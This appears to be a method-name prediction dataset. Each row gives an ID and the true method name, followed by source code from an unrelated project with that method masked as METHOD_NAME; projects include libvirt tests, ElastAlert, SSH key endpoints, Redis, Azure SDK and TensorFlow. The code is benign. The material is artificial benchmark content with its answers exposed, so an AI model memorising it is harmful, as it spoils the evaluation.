except aexpect.ShellTimeoutError:
test.fail("Failed to freeze file system. "
"Touch file timeout:\n%s" % output)
def cleanup(session):
"""
Clean up the test file used for freeze/thaw test.
:param session: Guest session to be cleaned up.
"""
status, output = session.cmd_status_output('rm -f freeze_test')
if status:
test.error("Failed to cleanup test file"
"Find created file failed:\n%s" % output)
if not virsh.has_help_command('domfsfreeze'):
test.cancel("This version of libvirt does not support "
"the domfsfreeze/domfsthaw test")
channel = ("yes" == params.get("prepare_channel", "yes"))
agent = ("yes" == params.get("start_agent", "yes"))
mountpoint = params.get("mountpoint", None)
vm_name = params.get("main_vm")
vm = env.get_vm(vm_name)
xml_backup = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
try:
# Add or remove qemu-agent from guest before test
vm.prepare_guest_agent(channel=channel, start=agent)
session = vm.wait_for_login()
try:
# Expected fail message patterns
fail_patts = []
if not channel:
fail_patts.append(r"QEMU guest agent is not configured")
if not agent:
# For older version
fail_patts.append(r"Guest agent not available for now")
# For newer version
fail_patts.append(r"Guest agent is not responding")
# Message patterns test should skip when met
skip_patts = [
r'The command \S+ has not been found',
r'specifying mountpoints is not supported',
]
res = virsh.domfsfreeze(vm_name, mountpoint=mountpoint)
libvirt.check_result(res, fail_patts, skip_patts)
if not res.exit_status:
METHOD_NAME(session)
res = virsh.domfsthaw(vm_name, mountpoint=mountpoint)
libvirt.check_result(res, fail_patts, skip_patts)
if not res.exit_status:
check_thaw(session)
cleanup(session)
finally:
session.close()
finally:
xml_backup.sync() |
298,490 | load tags | import json
import time
import uuid
import requests
from requests import RequestException
from elastalert.alerts import Alerter
from elastalert.util import lookup_es_key, EAException, elastalert_logger
class HiveAlerter(Alerter):
"""
Use matched data to create alerts containing observables in an instance of TheHive
"""
required_options = set(['hive_connection', 'hive_alert_config'])
def lookup_field(self, match: dict, field_name: str, default):
"""Populates a field with values depending on the contents of the Elastalert match
provided to it.
Uses a similar algorithm to that implemented to populate the `alert_text_args`.
First checks any fields found in the match provided, then any fields defined in
the rule, finally returning the default value provided if no value can be found.
"""
field_value = lookup_es_key(match, field_name)
if field_value is None:
field_value = self.rule.get(field_name, default)
return field_value
# Iterate through the matches, building up a list of observables
def load_observable_artifacts(self, match: dict):
artifacts = []
for mapping in self.rule.get('hive_observable_data_mapping', []):
for observable_type, mapping_key in mapping.items():
if (observable_type != "tlp" and observable_type != "message" and observable_type != "tags"):
data = str(self.lookup_field(match, mapping_key, ''))
if len(data) != 0:
artifact = {'tlp': 2,
'tags': [],
'message': None,
'dataType': observable_type,
'data': data}
if mapping.get('tlp') is not None:
artifact['tlp'] = mapping['tlp']
if mapping.get('message') is not None:
artifact['message'] = mapping['message']
if mapping.get('tags') is not None:
artifact['tags'] = mapping['tags']
artifacts.append(artifact)
break
return artifacts
def load_custom_fields(self, custom_fields_raw: list, match: dict):
custom_fields = {}
position = 0
for field in custom_fields_raw:
if (isinstance(field['value'], str)):
value = self.lookup_field(match, field['value'], field['value'])
else:
value = field['value']
custom_fields[field['name']] = {'order': position, field['type']: value}
position += 1
return custom_fields
def METHOD_NAME(self, tag_names: list, match: dict):
tag_values = set()
for tag in tag_names:
tag_value = self.lookup_field(match, tag, tag)
if isinstance(tag_value, list):
for sub_tag in tag_value:
tag_values.add(str(sub_tag))
else:
tag_values.add(str(tag_value))
return tag_values
def load_args(self, field, raw, match: dict):
missing = self.rule['hive_alert_config'].get(field + '_missing_value', '<MISSING VALUE>')
args = field + "_args"
if args in self.rule.get('hive_alert_config'):
process_args = self.rule['hive_alert_config'].get(args)
process_values=[]
for arg in process_args:
process_values.append(self.lookup_field(match, arg, missing))
for i, text_value in enumerate(process_values):
if text_value is None:
process_value = self.rule.get(process_args[i])
if process_value:
process_values[i] = process_value
process_values = [missing if val is None else val for val in process_values]
raw = raw.format(*process_values)
return raw
else:
return raw
def alert(self, matches):
# Build TheHive alert object, starting with some defaults, updating with any
# user-specified config
alert_config = {
'artifacts': [],
'customFields': {},
'date': int(time.time()) * 1000,
'description': self.create_alert_body(matches),
'sourceRef': str(uuid.uuid4()),
'tags': [],
'title': self.create_title(matches),
}
alert_config.update(self.rule.get('hive_alert_config', {}))
# Iterate through each match found, populating the alert tags and observables as required
tags = set()
artifacts = []
for match in matches:
artifacts = artifacts + self.load_observable_artifacts(match)
tags.update(self.METHOD_NAME(alert_config['tags'], match))
alert_config['artifacts'] = artifacts
alert_config['tags'] = list(tags)
# Populate the customFields
if len(matches) > 0:
#Populate dynamic fields
alert_config['customFields'] = self.load_custom_fields(alert_config['customFields'], matches[0])
alert_config['description']=self.load_args("description", alert_config['description'], matches[0])
if 'description_args' in alert_config:
del alert_config['description_args']
alert_config["title"] = self.load_args("title", alert_config["title"], matches[0])
if 'title_args' in alert_config:
del alert_config['title_args']
alert_config["type"] = self.load_args("type", alert_config["type"], matches[0])
if 'type_args' in alert_config:
del alert_config['type_args']
alert_config["source"] = self.load_args("source", alert_config["source"], matches[0])
if 'source_args' in alert_config:
del alert_config['source_args']
# POST the alert to TheHive
connection_details = self.rule['hive_connection']
api_key = connection_details.get('hive_apikey', '')
hive_host = connection_details.get('hive_host', 'http://localhost')
hive_port = connection_details.get('hive_port', 9000)
proxies = connection_details.get('hive_proxies', {'http': '', 'https': ''})
verify = connection_details.get('hive_verify', False)
alert_body = json.dumps(alert_config, indent=4, sort_keys=True)
req = f'{hive_host}:{hive_port}/api/alert'
headers = {'Content-Type': 'application/json',
'Authorization': f'Bearer {api_key}'}
try:
response = requests.post(req,
headers=headers,
data=alert_body,
proxies=proxies,
verify=verify)
response.raise_for_status()
except RequestException as e:
raise EAException(f"Error posting to TheHive: {e}")
elastalert_logger.info("Alert sent to TheHive")
def get_info(self):
return {
'type': 'hivealerter',
'hive_host': self.rule.get('hive_connection', {}).get('hive_host', '')
} |
298,491 | decorated | """
ssh_key_management: Endpoints for managing SSH keys on the robot
"""
import contextlib
import functools
import hashlib
import ipaddress
import logging
import os
from typing import (
Any,
Generator,
IO,
List,
Tuple,
)
from aiohttp import web
from .handler_type import Handler
LOG = logging.getLogger(__name__)
def require_linklocal(handler: Handler) -> Handler:
"""Ensure the decorated is only called if the request is linklocal.
The host ip address should be in the X-Host-IP header (provided by nginx)
"""
@functools.wraps(handler)
async def METHOD_NAME(request: web.Request) -> web.Response:
ipaddr_str = request.headers.get("x-host-ip")
invalid_req_data = {
"error": "bad-interface",
"message": (
f"The endpoint {request.rel_url}"
f" can only be used from link-local connections."
f" Make sure you're connected to this robot directly by cable"
f" and using this robot's wired IP address"
f" (not its wireless IP address)."
),
}
if not ipaddr_str:
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data=invalid_req_data, status=403
)
try:
addr = ipaddress.ip_address(ipaddr_str)
except ValueError:
LOG.exception(f"Couldn't parse host ip address {ipaddr_str}")
raise
if not addr.is_link_local:
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data=invalid_req_data, status=403
)
return await handler(request)
return METHOD_NAME
@contextlib.contextmanager
def authorized_keys(mode: str = "r") -> Generator[IO[Any], None, None]:
"""Open the authorized_keys file. Separate function for mocking.
:param mode: As :py:meth:`open`
"""
path = "/var/home/.ssh/authorized_keys"
if not os.path.exists(path):
os.makedirs(os.path.dirname(path))
open(path, "w").close()
with open(path, mode) as ak:
yield ak
def get_keys() -> List[Tuple[str, str]]:
"""Return a list of tuples of [md5(pubkey), pubkey]"""
with authorized_keys() as ak:
return [
(hashlib.new("md5", line.encode()).hexdigest(), line)
for line in ak.read().split("\n")
if line.strip()
]
def remove_by_hash(hashval: str) -> None:
"""Remove the key whose md5 sum matches hashval.
:raises: KeyError if the hashval wasn't found
"""
key_details = get_keys()
with authorized_keys("w") as ak:
for keyhash, key in key_details:
if keyhash != hashval:
ak.write(f"{key}\n")
break
else:
raise KeyError(hashval)
def key_present(hashval: str) -> bool:
"""Check if the key whose md5 is hashval is in authorized_keys
:returns: ``True`` if the key is present, ``False`` otherwise
"""
return hashval in [keyhash for keyhash, _ in get_keys()]
@require_linklocal
async def list_keys(request: web.Request) -> web.Response:
"""List keys in the authorized_keys file.
GET /server/ssh_keys
-> 200 OK {"public_keys": [{"key_md5": md5 hex digest, "key": key string}]}
(or 403 if not from the link-local connection)
"""
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
{
"public_keys": [
{"key_md5": details[0], "key": details[1]} for details in get_keys()
]
},
status=200,
)
@require_linklocal
async def add(request: web.Request) -> web.Response:
"""Add a public key to the authorized_keys file.
POST /server/ssh_keys {"key": key string}
-> 201 Created
If the key string doesn't look like an openssh public key, rejects with 400
"""
def key_error(error: str, message: str) -> web.Response:
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data={"error": error, "message": message}, status=400
)
body = await request.json()
if "key" not in body or not isinstance(body["key"], str):
return key_error("no-key", 'No "key" element in body')
pubkey = body["key"]
# Do some fairly minor sanitization; dropbear will ignore invalid keys but
# we still don’t want to have a bunch of invalid data in there
pubkey_parts = pubkey.split()
if len(pubkey_parts) == 0:
return key_error("bad-key", "Key is empty")
alg = pubkey_parts[0]
# We don’t allow dss so this has to be rsa or ecdsa and shouldn’t start
# with restrictions
if alg != "ssh-rsa" and not alg.startswith("ecdsa"):
LOG.warning(f"weird keyfile uploaded: starts with {alg}")
return key_error("bad-key", f"Key starts with invalid algorithm {alg}")
if "\n" in pubkey[:-1]:
LOG.warning("Newlines in keyfile that shouldn't be there")
return key_error("bad-key", "Key has a newline")
# This is a more or less correct key we can write
if "\n" == pubkey[-1]:
pubkey = pubkey[:-1]
hashval = hashlib.new("md5", pubkey.encode()).hexdigest()
if not key_present(hashval):
with authorized_keys("a") as ak:
ak.write(f"{pubkey}\n")
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data={"message": f"Added key {hashval}", "key_md5": hashval}, status=201
)
@require_linklocal
async def clear(request: web.Request) -> web.Response:
"""Clear all public keys from authorized_keys
DELETE /server/ssh_keys
-> 200 OK if successful
(or 403 if not from the link-local connection)
"""
with authorized_keys("w") as ak:
ak.write("\n".join([]) + "\n")
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data={
"message": "Keys cleared. " "Restart robot to take effect",
"restart_url": "/server/restart",
},
status=200,
)
@require_linklocal
async def remove(request: web.Request) -> web.Response:
"""Remove a public key from authorized_keys
DELETE /server/ssh_keys/:key_md5_hexdigest
-> 200 OK if the key was found
-> 404 Not Found otherwise
"""
requested_hash = request.match_info["key_md5"]
new_keys: List[str] = []
found = False
for keyhash, key in get_keys():
if keyhash == requested_hash:
found = True
else:
new_keys.append(key)
if not found:
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data={
"error": "invalid-key-hash",
"message": f"No such key md5 {requested_hash}",
},
status=404,
)
with authorized_keys("w") as ak:
ak.write("\n".join(new_keys) + "\n")
return web.json_response( # type: ignore[no-untyped-call,no-any-return]
data={
"message": f"Key {requested_hash} deleted. " "Restart robot to take effect",
"restart_url": "/server/restart",
},
status=200,
) |
298,492 | get | from __future__ import annotations
from datetime import timedelta
from typing import cast
from redis.asyncio import Redis
from redis.asyncio.connection import ConnectionPool
from litestar.exceptions import ImproperlyConfiguredException
from litestar.types import Empty, EmptyType
from .base import NamespacedStore
__all__ = ("RedisStore",)
class RedisStore(NamespacedStore):
"""Redis based, thread and process safe asynchronous key/value store."""
__slots__ = ("_redis",)
def __init__(self, redis: Redis, namespace: str | None | EmptyType = Empty) -> None:
"""Initialize :class:`RedisStore`
Args:
redis: An :class:`redis.asyncio.Redis` instance
namespace: A key prefix to simulate a namespace in redis. If not given,
defaults to ``LITESTAR``. Namespacing can be explicitly disabled by passing
``None``. This will make :meth:`.delete_all` unavailable.
"""
self._redis = redis
self.namespace: str | None = "LITESTAR" if namespace is Empty else namespace # type: ignore[assignment]
# script to get and renew a key in one atomic step
self._get_and_renew_script = self._redis.register_script(
b"""
local key = KEYS[1]
local renew = tonumber(ARGV[1])
local data = redis.call('GET', key)
local ttl = redis.call('TTL', key)
if ttl > 0 then
redis.call('EXPIRE', key, renew)
end
return data
"""
)
# script to delete all keys in the namespace
self._delete_all_script = self._redis.register_script(
b"""
local cursor = 0
repeat
local result = redis.call('SCAN', cursor, 'MATCH', ARGV[1])
for _,key in ipairs(result[2]) do
redis.call('UNLINK', key)
end
cursor = tonumber(result[1])
until cursor == 0
"""
)
@classmethod
def with_client(
cls,
url: str = "redis://localhost:6379",
*,
db: int | None = None,
port: int | None = None,
username: str | None = None,
password: str | None = None,
namespace: str | None | EmptyType = Empty,
) -> RedisStore:
"""Initialize a :class:`RedisStore` instance with a new class:`redis.asyncio.Redis` instance.
Args:
url: Redis URL to connect to
db: Redis database to use
port: Redis port to use
username: Redis username to use
password: Redis password to use
namespace: Virtual key namespace to use
"""
pool = ConnectionPool.from_url(
url=url,
db=db,
decode_responses=False,
port=port,
username=username,
password=password,
)
return cls(redis=Redis(connection_pool=pool), namespace=namespace)
def with_namespace(self, namespace: str) -> RedisStore:
"""Return a new :class:`RedisStore` with a nested virtual key namespace.
The current instances namespace will serve as a prefix for the namespace, so it
can be considered the parent namespace.
"""
return type(self)(redis=self._redis, namespace=f"{self.namespace}_{namespace}" if self.namespace else namespace)
def _make_key(self, key: str) -> str:
prefix = f"{self.namespace}:" if self.namespace else ""
return prefix + key
async def set(self, key: str, value: str | bytes, expires_in: int | timedelta | None = None) -> None:
"""Set a value.
Args:
key: Key to associate the value with
value: Value to store
expires_in: Time in seconds before the key is considered expired
Returns:
``None``
"""
if isinstance(value, str):
value = value.encode("utf-8")
await self._redis.set(self._make_key(key), value, ex=expires_in)
async def METHOD_NAME(self, key: str, renew_for: int | timedelta | None = None) -> bytes | None:
"""Get a value.
Args:
key: Key associated with the value
renew_for: If given and the value had an initial expiry time set, renew the
expiry time for ``renew_for`` seconds. If the value has not been set
with an expiry time this is a no-op. Atomicity of this step is guaranteed
by using a lua script to execute fetch and renewal. If ``renew_for`` is
not given, the script will be bypassed so no overhead will occur
Returns:
The value associated with ``key`` if it exists and is not expired, else
``None``
"""
key = self._make_key(key)
if renew_for:
if isinstance(renew_for, timedelta):
renew_for = renew_for.seconds
data = await self._get_and_renew_script(keys=[key], args=[renew_for])
return cast("bytes | None", data)
return await self._redis.METHOD_NAME(key)
async def delete(self, key: str) -> None:
"""Delete a value.
If no such key exists, this is a no-op.
Args:
key: Key of the value to delete
"""
await self._redis.delete(self._make_key(key))
async def delete_all(self) -> None:
"""Delete all stored values in the virtual key namespace.
Raises:
ImproperlyConfiguredException: If no namespace was configured
"""
if not self.namespace:
raise ImproperlyConfiguredException("Cannot perform delete operation: No namespace configured")
await self._delete_all_script(keys=[], args=[f"{self.namespace}*:*"])
async def exists(self, key: str) -> bool:
"""Check if a given ``key`` exists."""
return await self._redis.exists(self._make_key(key)) == 1
async def expires_in(self, key: str) -> int | None:
"""Get the time in seconds ``key`` expires in. If no such ``key`` exists or no
expiry time was set, return ``None``.
"""
ttl = await self._redis.ttl(self._make_key(key))
return None if ttl == -2 else ttl |
298,493 | add to main menu | #* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from PyQt5 import QtWidgets
import mooseutils
from .MooseWidget import MooseWidget
from .Preferences import Preferences
class Plugin(MooseWidget):
"""
A base class for all plugin objects.
A plugin object are stand-alone widgets contained by a peacock tab. In general, the plugins
should be independent and be able to be removed or added to a given tab. Plugins are stored
Manager objects.
see Manager.py
"""
def __init__(self, layout='MainLayout', settings_key="", **kwargs):
super(Plugin, self).__init__()
# Name of layout that this plugin should be added (see PluginManager.py)
self._main_layout_name = layout
# The default size policy
self.setSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
# Must be a QtWidget
if not isinstance(self, QtWidgets.QWidget):
mooseutils.mooseError("A Plugin must also be a QWidget.")
return
# The Peacock tab index
self._index = None
self._plugin_manager = None
self._preferences = Preferences(settings_key)
@staticmethod
def commandLineArgs(parser):
"""
Allows the plugin to add command line options to the parser.
"""
def setup(self):
"""
Adds automatic Preference callback connection to the setup method.
"""
super(Plugin, self).setup()
for key, widget in self._preferences._widgets.items():
name = key.split('/')[-1]
name = '_prefCallback{}{}'.format(name[0].upper(), name[1:])
callback = getattr(self, name, None)
if callback:
widget.valueSaved.connect(callback)
def connect(self, other):
"""
Connect the slots of supplied plugin (other) to the signals emited by this (self) plugin.
Args:
other[Plugin]: A plugin object to connect.
"""
if self is not other:
for name, signal in self.signals().items():
slot_name = 'on' + name[0].upper() + name[1:]
if hasattr(other, slot_name):
mooseutils.mooseDebug('{}.{} --> {}.{}'.format(self.__class__.__name__, name,
other.__class__.__name__, slot_name))
signal.connect(getattr(other, slot_name))
def setMainLayoutName(self, name):
"""
Method for changing the name of the main layout that this plugin will be added.
Args:
name[str]: The name of the layout within the PluginManager.
"""
self._main_layout_name = name
def mainLayoutName(self):
"""
Return the name of the layout within the PluginManager that this plugin is to be added.
"""
return self._main_layout_name
def repr(self):
"""
Return data for reproducing the plugin as a script.
"""
return dict()
def canClose(self):
"""
Called when the application wants to close.
This is intended to allow the plugin to check if it has unsaved state and ask
the user if they want to cancel the close or throw away the changes.
Return:
bool: Whether it is OK to close
"""
return True
def closing(self):
"""
Called when the application is about to close.
This is intended to allow the plugin to do any cleanup before closing
"""
pass
def onPreferencesSaved(self):
"""
Called when the preferences have been saved.
"""
def clearRecentlyUsed(self):
"""
Clears any recently used items
"""
def addToMenu(self, menu):
pass
def METHOD_NAME(self, menubar):
"""
This allows the plugin to add menu items to the main menu.
Args:
menubar[QMenuBar]: Menubar to add items to
"""
pass
def onCurrentChanged(self, index):
"""
Executes when the TabWidget (TabPluginManager) changes active tabs.
Inputs:
index[int]: The index of the active tab
"""
pass
def setTabIndex(self, index, signal=None):
"""
Set the Peacock Tab index (see TabPluginManager)
"""
if signal:
signal.connect(self.onCurrentChanged)
self._index = index
def preferenceWidgets(self):
return self._preferences.widgets()
def setupMenu(self, menu):
pass |
298,494 | unquote | from __future__ import annotations
from copy import deepcopy
import sqlglot
import sqlglot.expressions as exp
from sqlglot.errors import ParseError
from .default_from_jsonschema import default_value_from_schema
def sqlglot_tree_signature(tree):
"""
A short string representation of a SQLglot tree.
Allows you to easily check that a tree contains certain nodes
For instance, the string "robin['hi']" becomes:
'bracket column literal identifier'
"""
return " ".join(n[0].key for n in tree.walk())
def add_suffix(tree, suffix):
tree = tree.copy()
identifier_string = tree.find(exp.Identifier).this
identifier_string = f"{identifier_string}{suffix}"
tree.find(exp.Identifier).args["this"] = identifier_string
return tree
def add_prefix(tree, prefix):
tree = tree.copy()
identifier_string = tree.find(exp.Identifier).this
identifier_string = f"{prefix}{identifier_string}"
tree.find(exp.Identifier).args["this"] = identifier_string
return tree
def add_table(tree, tablename):
tree = tree.copy()
table_identifier = exp.Identifier(this=tablename, quoted=True)
identifier = tree.find(exp.Column)
identifier.args["table"] = table_identifier
return tree
def remove_quotes_from_identifiers(tree):
tree = tree.copy()
for identifier in tree.find_all(exp.Identifier):
identifier.args["quoted"] = False
return tree
class InputColumn:
def __init__(self, name, settings_obj=None, sql_dialect=None):
# If settings_obj is None, then default values will be used
# from the jsonschama
self._settings_obj = settings_obj
if sql_dialect:
self._sql_dialect = sql_dialect
elif settings_obj:
self._sql_dialect = self._settings_obj._sql_dialect
else:
self._sql_dialect = None
self.input_name = self._quote_name(name)
self.input_name_as_tree = self.parse_input_name_to_sqlglot_tree()
for identifier in self.input_name_as_tree.find_all(exp.Identifier):
identifier.args["quoted"] = True
def quote(self):
self_copy = deepcopy(self)
for identifier in self_copy.input_name_as_tree.find_all(exp.Identifier):
identifier.args["quoted"] = True
return self_copy
def METHOD_NAME(self):
self_copy = deepcopy(self)
for identifier in self_copy.input_name_as_tree.find_all(exp.Identifier):
identifier.args["quoted"] = False
return self_copy
def parse_input_name_to_sqlglot_tree(self):
# Cases that could occur for self.input_name:
# SUR name -> parses to 'alias column identifier identifier'
# first and surname -> parses to 'and column column identifier identifier'
# a b c -> parse error
# "SUR name" -> parses to 'column identifier'
# geocode['lat'] -> parsees to bracket column literal identifier
# geocode[1] -> parsees to bracket column literal identifier
# Note we don't expect SUR name[1] since the user should have quoted this
try:
tree = sqlglot.parse_one(self.input_name, read=self._sql_dialect)
except ParseError:
tree = sqlglot.parse_one(f'"{self.input_name}"', read=self._sql_dialect)
tree_signature = sqlglot_tree_signature(tree)
valid_signatures = ["column identifier", "bracket column literal identifier"]
if tree_signature in valid_signatures:
return tree
else:
# e.g. SUR name parses to 'alias column identifier identifier'
# but we want "SUR name"
tree = sqlglot.parse_one(f'"{self.input_name}"', read=self._sql_dialect)
return tree
def from_settings_obj_else_default(self, key, schema_key=None):
# Covers the case where no settings obj is set on the comparison level
if self._settings_obj:
return getattr(self._settings_obj, key)
else:
if not schema_key:
schema_key = key
return default_value_from_schema(schema_key, "root")
@property
def gamma_prefix(self):
return self.from_settings_obj_else_default(
"_gamma_prefix", "comparison_vector_value_column_prefix"
)
@property
def bf_prefix(self):
return self.from_settings_obj_else_default(
"_bf_prefix", "bayes_factor_column_prefix"
)
@property
def tf_prefix(self):
return self.from_settings_obj_else_default(
"_tf_prefix", "term_frequency_adjustment_column_prefix"
)
def name(self):
return self.input_name_as_tree.sql(dialect=self._sql_dialect)
def name_l(self):
return add_suffix(self.input_name_as_tree, suffix="_l").sql(
dialect=self._sql_dialect
)
def name_r(self):
return add_suffix(self.input_name_as_tree, suffix="_r").sql(
dialect=self._sql_dialect
)
def names_l_r(self):
return [self.name_l(), self.name_r()]
def l_name_as_l(self):
name_with_l_table = add_table(self.input_name_as_tree, "l").sql(
dialect=self._sql_dialect
)
return f"{name_with_l_table} as {self.name_l()}"
def r_name_as_r(self):
name_with_r_table = add_table(self.input_name_as_tree, "r").sql(
dialect=self._sql_dialect
)
return f"{name_with_r_table} as {self.name_r()}"
def l_r_names_as_l_r(self):
return [self.l_name_as_l(), self.r_name_as_r()]
def bf_name(self):
return add_prefix(self.input_name_as_tree, prefix=self.bf_prefix).sql(
dialect=self._sql_dialect
)
def tf_name(self):
return add_prefix(self.input_name_as_tree, prefix=self.tf_prefix).sql(
dialect=self._sql_dialect
)
def tf_name_l(self):
tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
return add_suffix(tree, suffix="_l").sql(dialect=self._sql_dialect)
def tf_name_r(self):
tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
return add_suffix(tree, suffix="_r").sql(dialect=self._sql_dialect)
def tf_name_l_r(self):
return [self.tf_name_l(), self.tf_name_r()]
def l_tf_name_as_l(self):
tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
tf_name_with_l_table = add_table(tree, tablename="l").sql(
dialect=self._sql_dialect
)
return f"{tf_name_with_l_table} as {self.tf_name_l()}"
def r_tf_name_as_r(self):
tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
tf_name_with_r_table = add_table(tree, tablename="r").sql(
dialect=self._sql_dialect
)
return f"{tf_name_with_r_table} as {self.tf_name_r()}"
def l_r_tf_names_as_l_r(self):
return [self.l_tf_name_as_l(), self.r_tf_name_as_r()]
def _quote_name(self, name: str) -> str:
# Quote column names that are also SQL keywords
if name not in {"group", "index"}:
return name
start, end = _get_dialect_quotes(self._sql_dialect)
return start + name + end
def _get_dialect_quotes(dialect):
start = end = '"'
if dialect is None:
return start, end
try:
sqlglot_dialect = sqlglot.Dialect[dialect.lower()]
except KeyError:
return start, end
return _get_sqlglot_dialect_quotes(sqlglot_dialect)
def _get_sqlglot_dialect_quotes(dialect: sqlglot.Dialect):
# TODO: once we drop support for sqlglot < 6.0.0, we can simplify this
try:
# For sqlglot < 6.0.0
quotes = dialect.identifiers
quote = '"' if '"' in quotes else quotes[0]
start = end = quote
except AttributeError:
# For sqlglot >= 6.0.0
start = dialect.identifier_start
end = dialect.identifier_end
return start, end |
298,495 | get | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RecoverableServersOperations:
"""RecoverableServersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.rdbms.mariadb.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def METHOD_NAME(
self,
resource_group_name: str,
server_name: str,
**kwargs: Any
) -> "_models.RecoverableServerResource":
"""Gets a recoverable MariaDB Server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RecoverableServerResource, or the result of cls(response)
:rtype: ~azure.mgmt.rdbms.mariadb.models.RecoverableServerResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RecoverableServerResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self.METHOD_NAME.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.METHOD_NAME(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('RecoverableServerResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
METHOD_NAME.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBForMariaDB/servers/{serverName}/recoverableServers'} # type: ignore |
298,496 | test linear model with single input | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras Premade Linear models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.feature_column import dense_features_v2
from tensorflow.python.feature_column import feature_column_v2 as fc
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.keras import backend
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import losses
from tensorflow.python.keras.engine import input_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.keras.premade import linear
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class LinearModelTest(keras_parameterized.TestCase):
def METHOD_NAME(self):
model = linear.LinearModel()
inp = np.random.uniform(low=-5, high=5, size=(64, 2))
output = .3 * inp[:, 0] + .2 * inp[:, 1]
model.compile('sgd', 'mse', [])
model.fit(inp, output, epochs=5)
self.assertTrue(model.built)
def test_linear_model_with_multi_input(self):
model = linear.LinearModel()
input_a = np.random.uniform(low=-5, high=5, size=(64, 1))
input_b = np.random.uniform(low=-5, high=5, size=(64, 1))
output = .3 * input_a + .2 * input_b
model.compile('sgd', 'mse', [])
model.fit([input_a, input_b], output, epochs=5)
def test_linear_model_as_layer(self):
input_a = input_layer.Input(shape=(1,), name='a')
output_a = linear.LinearModel()(input_a)
input_b = input_layer.Input(shape=(1,), name='b')
output_b = core.Dense(units=1)(input_b)
output = output_a + output_b
model = training.Model(inputs=[input_a, input_b], outputs=[output])
input_a_np = np.random.uniform(low=-5, high=5, size=(64, 1))
input_b_np = np.random.uniform(low=-5, high=5, size=(64, 1))
output_np = .3 * input_a_np + .2 * input_b_np
model.compile('sgd', 'mse', [])
